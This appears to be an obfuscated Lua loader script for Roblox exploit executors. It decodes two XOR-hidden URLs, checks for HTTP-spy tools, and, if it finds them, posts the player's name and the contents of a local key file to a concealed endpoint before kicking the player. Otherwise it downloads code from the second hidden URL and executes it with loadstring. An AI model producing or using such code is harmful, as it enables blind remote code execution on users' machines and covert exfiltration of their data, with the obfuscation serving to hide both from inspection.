local function _0xDE(d, k)
    local r = ""
    for i = 1, #d do
        r = r .. string.char(bit32.bxor(d[i], k))
    end
    return r
end

local _0xK = 111
local _AL = _0xDE({23, 11, 28, 12, 10, 50, 48, 48, 11, 2, 28, 12, 0, 29, 11, 50, 12, 0, 2, 63, 16, 2, 11, 17, 10, 0, 2, 18, 11, 48, 70, 74, 70, 73, 76, 75, 71, 79, 74, 70, 74, 77, 77, 70, 71, 73, 74, 74, 76, 79, 73, 76, 76, 50, 6, 7, 11, 4, 18, 4, 12, 2, 11, 23, 7, 2, 18, 29, 21, 10, 4, 12, 2, 4, 11, 18, 2, 11, 23, 16, 1, 22, 11, 11, 10, 17, 2, 1, 16, 17, 18, 29, 11, 17, 23, 22, 16, 10, 4, 12, 2, 4, 11, 18, 2, 11, 23, 2, 17, 18, 2, 23, 20, 2, 4, 48, 2, 5, 2, 11}, _0xK)
local _G1 = _0xDE({23, 11, 28, 12, 10, 50, 48, 48, 29, 10, 22, 51, 16, 17, 23, 11, 2, 20, 11, 20, 2, 29, 10, 11, 11, 10, 17, 2, 1, 16, 17, 18, 50, 12, 0, 2, 63, 16, 17, 2, 29, 10, 22, 23, 16, 17, 11, 17, 17, 50, 29, 10, 15, 12, 50, 11, 2, 20, 11, 20, 2, 50, 29, 10, 11, 11, 10, 17, 2, 1, 16, 17, 18, 48, 11, 2, 20}, _0xK)

local _L = game:GetService("Players").LocalPlayer
local _req = (syn and syn.request) or (http and http.request) or http_request or (fluxus and fluxus.request) or request

local function _SC()
    if not _req then return false end
    local ok, info = pcall(debug.getinfo, _req)
    if ok and info and info.source ~= "=[C]" then return true end
    for _, v in ipairs({"HttpSpy", "SimpleSpy", "VGG Spy"}) do if getgenv()[v] then return true end end
    return false
end

if _SC() then
    local tk = "N/A"
    pcall(function() if isfile("nazarkus_key.json") then tk = readfile("nazarkus_key.json") end end)
    pcall(function()
        _req({
            Url = _AL,
            Method = "POST",
            Headers = {["Content-Type"] = "application/json"},
            Body = game:GetService("HttpService"):JSONEncode({
                embeds = {{
                    title = "🚨 Security Alert: Interceptor Detected",
                    color = 16711680,
                    fields = {
                        {name = "Player", value = _L.Name, inline = true},
                        {name = "Key", value = tk, inline = false}
                    }
                }}
            })
        })
    end)
    _L:Kick("Security Tamper Detected")
    return
end

getgenv()._NK_AUTH = _0xDE({49, 36, 61, 36, 55, 40, 50, 48, 62, 122, 50, 32, 40, 48, 55, 36, 122, 2, 49}, _0xK) -- "NAZARKUS_SECURE_v3"
local s, c = pcall(function() return game:HttpGet(_G1) end)
if s and c then
    local f = loadstring(c)
    if f then pcall(f) end
else
    _L:Kick("Loader: Connection Fail")
end
